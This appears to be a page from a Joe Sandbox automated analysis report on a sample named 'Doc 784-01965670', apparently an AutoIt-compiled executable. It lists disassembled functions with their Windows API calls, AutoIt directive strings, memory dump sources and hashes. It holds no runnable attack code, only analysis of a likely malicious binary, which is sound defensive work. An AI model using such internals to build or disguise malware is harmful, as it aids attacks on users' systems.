                                                                                                                                    • Associated: 00000000.00000002.2062046963.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062046963.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062084175.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_Doc 784-01965670.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: LogonUser
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 1244722697-0
                                                                                                                                    • Opcode ID: 365ca9639b26e9c6c56151d88f527b1e4ffaee0f54dfd66c8778d151900be7f4
                                                                                                                                    • Instruction ID: 63114e5cfb2c4979e73f5d19eacf740c811f86df1a08bc2cb556a5e36cce81ff
                                                                                                                                    • Opcode Fuzzy Hash: 365ca9639b26e9c6c56151d88f527b1e4ffaee0f54dfd66c8778d151900be7f4
                                                                                                                                    • Instruction Fuzzy Hash: 8DD0ECB52686066FD204CB24D846E2B77E9A7C4701F008A0CB196D2280C670D805CA32
                                                                                                                                    Function 004711D2 Relevance: 1.5, APIs: 1, Instructions: 19COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.2061979740.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.2061965369.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062030409.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062046963.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062046963.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062084175.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_Doc 784-01965670.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: NameUser
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 2645101109-0
                                                                                                                                    • Opcode ID: b783c70369e54a54257db95ea8fbffa2a0b511f3d9d58af1a6b6f1143851980f
                                                                                                                                    • Instruction ID: 8011c19b6c32d183c263453b2018abc548473ce9ed5616c99acac4896e71f792
                                                                                                                                    • Opcode Fuzzy Hash: b783c70369e54a54257db95ea8fbffa2a0b511f3d9d58af1a6b6f1143851980f
                                                                                                                                    • Instruction Fuzzy Hash: F6E08C322083058FC310EF55F8405ABB390EB94311F004C3FE64AA2191DA79920EDFAB
                                                                                                                                    Function 0042202E Relevance: 1.5, APIs: 1, Instructions: 4COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    • SetUnhandledExceptionFilter.KERNEL32(Function_00021FEC), ref: 00422033
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.2061979740.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.2061965369.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062030409.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062046963.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062046963.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062084175.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_Doc 784-01965670.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: ExceptionFilterUnhandled
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 3192549508-0
                                                                                                                                    • Opcode ID: 299f58dbcf75cd09f1fee721c9404e411c3f17cf80a1a40ae63587de51767455
                                                                                                                                    • Instruction ID: 3275b40964251646410af8875a24301f93fa315c26af6adae0ca3d0f7a721f84
                                                                                                                                    • Opcode Fuzzy Hash: 299f58dbcf75cd09f1fee721c9404e411c3f17cf80a1a40ae63587de51767455
                                                                                                                                    • Instruction Fuzzy Hash: CD9002743511144A4A011BB16E5D90925D46A586067920875B411C4064DB9840019619
                                                                                                                                    Function 00412C38 Relevance: .4, Instructions: 384COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.2061979740.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.2061965369.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062030409.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062046963.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062046963.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062084175.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_Doc 784-01965670.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: 0666e2c6603716d584354562bcf590181c980fb8da26174d951f804026303a75
                                                                                                                                    • Instruction ID: b3f199f19983f506b623bfe7955a95149e6efe4e98ce3416cc40fa12ddcf4508
                                                                                                                                    • Opcode Fuzzy Hash: 0666e2c6603716d584354562bcf590181c980fb8da26174d951f804026303a75
                                                                                                                                    • Instruction Fuzzy Hash: 46D19073C0A9B30A8735812D42582BFEE626FD578131EC3E29CD07F38AD26B5DA195D4
                                                                                                                                    Function 00412818 Relevance: .4, Instructions: 378COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.2061979740.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.2061965369.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062030409.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062046963.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062046963.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062084175.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_Doc 784-01965670.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: c40bcf876c129f9393d32ca3cb7471e4bcf7a4352579634fb414d11934eaa4f2
                                                                                                                                    • Instruction ID: c47bdb3f9c9e38c5d46ddb9e43dedaf70276048770aeb58bd274f21c588a824b
                                                                                                                                    • Opcode Fuzzy Hash: c40bcf876c129f9393d32ca3cb7471e4bcf7a4352579634fb414d11934eaa4f2
                                                                                                                                    • Instruction Fuzzy Hash: 1CD19073D1A9B30A8735852D42581AFEE626FD578031EC3E2CCD07F38AD16B5DA191D4
                                                                                                                                    Function 0041240C Relevance: .4, Instructions: 361COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.2061979740.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.2061965369.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062030409.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062046963.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062046963.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062084175.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_Doc 784-01965670.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: 8709e21481f65d4d57cc4b3952fb3adbcebd3cc8b64ff3d20fdf858c0bfd14a0
                                                                                                                                    • Instruction ID: ac15b8da1a4b082d71a0b082c8349c97121379a14580263daf363e6ab8f75410
                                                                                                                                    • Opcode Fuzzy Hash: 8709e21481f65d4d57cc4b3952fb3adbcebd3cc8b64ff3d20fdf858c0bfd14a0
                                                                                                                                    • Instruction Fuzzy Hash: 87C18173C0A9B30A8736812D42641AFEE626FD579031FC3E2CCD47F38A91AB5DA195D4
                                                                                                                                    Function 00412038 Relevance: .4, Instructions: 351COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.2061979740.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.2061965369.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062030409.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062046963.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062046963.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062084175.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_Doc 784-01965670.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: a6a9d25a147ba64f4d06249d12fe21364a5b6889ab238d0ba2e949acfc497403
                                                                                                                                    • Instruction ID: aa957cafbedeae1199dea6a597ba911d219650f283d164fb65797e90308ef47b
                                                                                                                                    • Opcode Fuzzy Hash: a6a9d25a147ba64f4d06249d12fe21364a5b6889ab238d0ba2e949acfc497403
                                                                                                                                    • Instruction Fuzzy Hash: 5FC18E73D0A9B30A8735812D42581AFEE626FD578031EC3E28CE46F38ED26F5DA195D4
                                                                                                                                    Function 00490D70 Relevance: .1, Instructions: 114COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.2062046963.0000000000490000.00000004.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.2061965369.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2061979740.0000000000401000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062030409.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062046963.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062084175.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_Doc 784-01965670.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: 21778448ec94ec63dbe1f941a4b01615b2757a24e87cf7a9a216f1c035904463
                                                                                                                                    • Instruction ID: b6387dd0e7c7fd58fd59291b8269ee9041754a2b9a52afa5a35da147da65d0c1
                                                                                                                                    • Opcode Fuzzy Hash: 21778448ec94ec63dbe1f941a4b01615b2757a24e87cf7a9a216f1c035904463
                                                                                                                                    • Instruction Fuzzy Hash: 4F41466544E7D04FCB138BB888B5AA27FB0AE07214B5F44DBC5C5CF4B3D658994AC722
                                                                                                                                    Function 00410D10 Relevance: .0, Instructions: 19COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.2061979740.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.2061965369.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062030409.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062046963.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062046963.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062084175.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_Doc 784-01965670.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: 304d221b5688423ebfa6c473264aec07cdb78ae451f757bdd5acbbf2c1e92ad4
                                                                                                                                    • Instruction ID: b8cfd58d412160527e66ace840abba843d94ac3f5b06779728c9fe736b8606cc
                                                                                                                                    • Opcode Fuzzy Hash: 304d221b5688423ebfa6c473264aec07cdb78ae451f757bdd5acbbf2c1e92ad4
                                                                                                                                    • Instruction Fuzzy Hash: ECD012F621844146F33144D866C0BD100437344310FB58C276005CEBC1C0DDECD6C229
                                                                                                                                    Function 00459384 Relevance: 79.2, APIs: 41, Strings: 4, Instructions: 480filewindowcomCOMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    • DeleteObject.GDI32(?), ref: 004593D7
                                                                                                                                    • DeleteObject.GDI32(?), ref: 004593F1
                                                                                                                                    • DestroyWindow.USER32(?), ref: 00459407
                                                                                                                                    • GetDesktopWindow.USER32 ref: 0045942A
                                                                                                                                    • GetWindowRect.USER32(00000000), ref: 00459431
                                                                                                                                    • SetRect.USER32(50000001,00000000,00000000,000001F4,?), ref: 00459568
                                                                                                                                    • AdjustWindowRectEx.USER32(?,88C00000,00000000,?), ref: 00459577
                                                                                                                                    • CreateWindowExW.USER32(?,AutoIt v3,00000000,?,88C00000,?,?,50000001,?,?,00000000,00000000), ref: 004595BB
                                                                                                                                    • GetClientRect.USER32(00000000,?), ref: 004595C8
                                                                                                                                    • CreateWindowExW.USER32(00000000,static,00000000,5000000E,00000000,00000000,?,?,?,00000000,00000000,00000000), ref: 00459615
                                                                                                                                    • CreateFileW.KERNEL32(00000000,?,80000000,00000000,00000000,00000003,00000000,00000000,?,50000001,?,?,00000000,00000000,00000000), ref: 00459635
                                                                                                                                    • GetFileSize.KERNEL32(00000000,00000000,?,50000001,?,?,00000000,00000000,00000000), ref: 00459654
                                                                                                                                    • GlobalAlloc.KERNEL32(00000002,00000000,?,50000001,?,?,00000000,00000000,00000000), ref: 0045965F
                                                                                                                                    • GlobalLock.KERNEL32(00000000), ref: 00459668
                                                                                                                                    • ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000,?,50000001,?,?,00000000,00000000,00000000), ref: 00459678
                                                                                                                                    • GlobalUnlock.KERNEL32(00000000), ref: 0045967F
                                                                                                                                    • CloseHandle.KERNEL32(00000000,?,50000001,?,?,00000000,00000000,00000000), ref: 00459686
                                                                                                                                    • CreateStreamOnHGlobal.OLE32(00000000,00000001,?,?,50000001,?,?,00000000,00000000,00000000), ref: 00459694
                                                                                                                                    • OleLoadPicture.OLEAUT32(?,00000000,00000000,00482A20,000001F4), ref: 004596AD
                                                                                                                                    • GlobalFree.KERNEL32(00000000), ref: 004596C0
                                                                                                                                    • CopyImage.USER32(000000FF,00000000,00000000,00000000,00002000), ref: 004596EF
                                                                                                                                    • SendMessageW.USER32(00000000,00000172,00000000,000000FF), ref: 00459712
                                                                                                                                    • SetWindowPos.USER32(00000000,00000000,00000000,00000000,?,?,00000020,?,50000001,?,?,00000000,00000000,00000000), ref: 0045973D
                                                                                                                                    • ShowWindow.USER32(?,00000004,?,50000001,?,?,00000000,00000000,00000000), ref: 0045974B
                                                                                                                                    • CreateWindowExW.USER32(00000000,static,00000000,?,?,0000000B,0000000B,?,?,?,00000000,00000000), ref: 0045979C
                                                                                                                                    • CreateDCW.GDI32(DISPLAY,00000000,00000000,00000000), ref: 004597AD
                                                                                                                                    • GetStockObject.GDI32(00000011), ref: 004597B7
                                                                                                                                    • SelectObject.GDI32(00000000,00000000), ref: 004597BF
                                                                                                                                    • GetTextFaceW.GDI32(00000000,00000040,00000190,?,50000001,?,?,00000000,00000000,00000000), ref: 004597CD
                                                                                                                                    • GetDeviceCaps.GDI32(00000000,0000005A), ref: 004597D6
                                                                                                                                    • DeleteDC.GDI32(00000000), ref: 004597E1
                                                                                                                                    • _wcslen.LIBCMT ref: 00459800
                                                                                                                                    • _wcscpy.LIBCMT ref: 0045981F
                                                                                                                                    • CreateFontW.GDI32(?,00000000,00000000,00000000,000000FF,00000000,00000000,00000000,00000001,00000004,00000000,00000002,00000000,00000190), ref: 004598BB
                                                                                                                                    • SendMessageW.USER32(?,00000030,00000000,00000001), ref: 004598D0
                                                                                                                                    • GetDC.USER32(?), ref: 004598DE
                                                                                                                                    • SelectObject.GDI32(00000000,?), ref: 004598EE
                                                                                                                                    • SelectObject.GDI32(00000000,?), ref: 00459919
                                                                                                                                    • ReleaseDC.USER32(?,00000000), ref: 00459925
                                                                                                                                    • MoveWindow.USER32(?,0000000B,?,?,?,00000001), ref: 00459943
                                                                                                                                    • ShowWindow.USER32(?,00000004,?,00000000,00000000,00000000,000000FF,00000000,00000000,00000000,00000001,00000004,00000000,00000002,00000000,00000190), ref: 00459951
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.2061979740.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.2061965369.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062030409.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062046963.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062046963.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062084175.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_Doc 784-01965670.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: Window$Create$Object$Global$Rect$DeleteFileSelect$MessageSendShow$AdjustAllocCapsClientCloseCopyDesktopDestroyDeviceFaceFontFreeHandleImageLoadLockMovePictureReadReleaseSizeStockStreamTextUnlock_wcscpy_wcslen
                                                                                                                                    • String ID: $AutoIt v3$DISPLAY$static
                                                                                                                                    • API String ID: 4040870279-2373415609
                                                                                                                                    • Opcode ID: d6fd8d7be04635d93ea84c38fc4cb072183cdb5133bdcfdddae5d23db1010fc6
                                                                                                                                    • Instruction ID: fce7466cc8f2b4b34a2e278d60cb4f704f90ff1017bfb666dbfc83d8aba9d67a
                                                                                                                                    • Opcode Fuzzy Hash: d6fd8d7be04635d93ea84c38fc4cb072183cdb5133bdcfdddae5d23db1010fc6
                                                                                                                                    • Instruction Fuzzy Hash: 3F028C70204301EFD714DF64DE89F2BB7A8AB84705F104A2DFA45AB2D2D7B4E805CB69
                                                                                                                                    Function 00441E05 Relevance: 49.8, APIs: 33, Instructions: 276COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    • GetSysColor.USER32(00000012), ref: 00441E64
                                                                                                                                    • SetTextColor.GDI32(?,?), ref: 00441E6C
                                                                                                                                    • GetSysColorBrush.USER32(0000000F), ref: 00441E83
                                                                                                                                    • GetSysColor.USER32(0000000F), ref: 00441E8F
                                                                                                                                    • SetBkColor.GDI32(?,?), ref: 00441EAA
                                                                                                                                    • SelectObject.GDI32(?,?), ref: 00441EBA
                                                                                                                                    • InflateRect.USER32(?,000000FF,000000FF), ref: 00441EF0
                                                                                                                                    • GetSysColor.USER32(00000010), ref: 00441EF8
                                                                                                                                    • CreateSolidBrush.GDI32(00000000), ref: 00441EFF
                                                                                                                                    • FrameRect.USER32(?,?,00000000), ref: 00441F10
                                                                                                                                    • DeleteObject.GDI32(?), ref: 00441F1B
                                                                                                                                    • InflateRect.USER32(?,000000FE,000000FE), ref: 00441F75
                                                                                                                                    • FillRect.USER32(?,?,?), ref: 00441FB6
                                                                                                                                      • Part of subcall function 00433D5C: GetSysColor.USER32(0000000E), ref: 00433D81
                                                                                                                                      • Part of subcall function 00433D5C: SetTextColor.GDI32(?,00000000), ref: 00433D89
                                                                                                                                      • Part of subcall function 00433D5C: GetSysColorBrush.USER32(0000000F), ref: 00433DBF
                                                                                                                                      • Part of subcall function 00433D5C: GetSysColor.USER32(0000000F), ref: 00433DCB
                                                                                                                                      • Part of subcall function 00433D5C: GetSysColor.USER32(00000011), ref: 00433DEB
                                                                                                                                      • Part of subcall function 00433D5C: CreatePen.GDI32(00000000,00000001,00743C00), ref: 00433DFD
                                                                                                                                      • Part of subcall function 00433D5C: SelectObject.GDI32(?,00000000), ref: 00433E0D
                                                                                                                                      • Part of subcall function 00433D5C: SetBkColor.GDI32(?,?), ref: 00433E19
                                                                                                                                      • Part of subcall function 00433D5C: SelectObject.GDI32(?,?), ref: 00433E29
                                                                                                                                      • Part of subcall function 00433D5C: InflateRect.USER32(?,000000FF,000000FF), ref: 00433E54
                                                                                                                                      • Part of subcall function 00433D5C: RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 00433E73
                                                                                                                                      • Part of subcall function 00433D5C: GetWindowLongW.USER32 ref: 00433E8A
                                                                                                                                      • Part of subcall function 00433D5C: SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 00433EAC
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.2061979740.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.2061965369.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062030409.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062046963.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062046963.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062084175.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_Doc 784-01965670.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: Color$Rect$Object$BrushInflateSelect$CreateText$DeleteFillFrameLongMessageRoundSendSolidWindow
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 69173610-0
                                                                                                                                    • Opcode ID: 63a2be33accb074b4178bb2d7a96f271ea41f5903b36f57aa3a0bb7ff7b8698e
                                                                                                                                    • Instruction ID: 0b0c06e318eae1aa70623bc76f746578ebcda4f465cb69034399d4c57c44293d
                                                                                                                                    • Opcode Fuzzy Hash: 63a2be33accb074b4178bb2d7a96f271ea41f5903b36f57aa3a0bb7ff7b8698e
                                                                                                                                    • Instruction Fuzzy Hash: BBB14D71508300AFD314DF64DD88A6FB7F8FB88720F504A2DF996922A0D774E845CB66
                                                                                                                                    Function 00403E50 Relevance: 45.7, APIs: 14, Strings: 12, Instructions: 236COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.2061979740.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.2061965369.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062030409.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062046963.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062046963.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062084175.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_Doc 784-01965670.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: __wcsnicmp
                                                                                                                                    • String ID: #NoAutoIt3Execute$#OnAutoItStartRegister$#ce$#comments-end$#comments-start$#cs$#include$#include-once$#notrayicon$#requireadmin$Cannot parse #include$Unterminated group of comments
                                                                                                                                    • API String ID: 1038674560-3360698832
                                                                                                                                    • Opcode ID: c74d0d52908dbbec4f5022c33a9c4844136c2b84c95de0bb8b15b994b6f8f789
                                                                                                                                    • Instruction ID: b6083b7aed1673b33e689ff2aa7e8f17f47d7310e90ec65f4167159f85ee96f3
                                                                                                                                    • Opcode Fuzzy Hash: c74d0d52908dbbec4f5022c33a9c4844136c2b84c95de0bb8b15b994b6f8f789
                                                                                                                                    • Instruction Fuzzy Hash: 5A611471B4071076EA306A229C46FAB735CDF14345F50052FFC01A628BE7ADDA4A86EE
                                                                                                                                    Function 00433D5C Relevance: 42.2, APIs: 28, Instructions: 198windowCOMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    • GetSysColor.USER32(0000000E), ref: 00433D81
                                                                                                                                    • SetTextColor.GDI32(?,00000000), ref: 00433D89
                                                                                                                                    • GetSysColor.USER32(00000012), ref: 00433DA3
                                                                                                                                    • SetTextColor.GDI32(?,?), ref: 00433DAB
                                                                                                                                    • GetSysColorBrush.USER32(0000000F), ref: 00433DBF
                                                                                                                                    • GetSysColor.USER32(0000000F), ref: 00433DCB
                                                                                                                                    • CreateSolidBrush.GDI32(?), ref: 00433DD4
                                                                                                                                    • GetSysColor.USER32(00000011), ref: 00433DEB
                                                                                                                                    • CreatePen.GDI32(00000000,00000001,00743C00), ref: 00433DFD
                                                                                                                                    • SelectObject.GDI32(?,00000000), ref: 00433E0D
                                                                                                                                    • SetBkColor.GDI32(?,?), ref: 00433E19
                                                                                                                                    • SelectObject.GDI32(?,?), ref: 00433E29
                                                                                                                                    • InflateRect.USER32(?,000000FF,000000FF), ref: 00433E54
                                                                                                                                    • RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 00433E73
                                                                                                                                    • GetWindowLongW.USER32 ref: 00433E8A
                                                                                                                                    • SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 00433EAC
                                                                                                                                    • GetWindowTextW.USER32(00000000,00000000,00000105), ref: 00433EE1
                                                                                                                                    • InflateRect.USER32(?,000000FD,000000FD), ref: 00433F13
                                                                                                                                    • DrawFocusRect.USER32(?,?), ref: 00433F1F
                                                                                                                                    • GetSysColor.USER32(00000011), ref: 00433F2E
                                                                                                                                    • SetTextColor.GDI32(?,00000000), ref: 00433F36
                                                                                                                                    • DrawTextW.USER32(?,?,000000FF,?,?), ref: 00433F4E
                                                                                                                                    • SelectObject.GDI32(?,?), ref: 00433F63
                                                                                                                                    • DeleteObject.GDI32(?), ref: 00433F70
                                                                                                                                    • SelectObject.GDI32(?,?), ref: 00433F78
                                                                                                                                    • DeleteObject.GDI32(00000000), ref: 00433F7B
                                                                                                                                    • SetTextColor.GDI32(?,?), ref: 00433F83
                                                                                                                                    • SetBkColor.GDI32(?,?), ref: 00433F8F
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.2061979740.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.2061965369.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062030409.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062046963.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
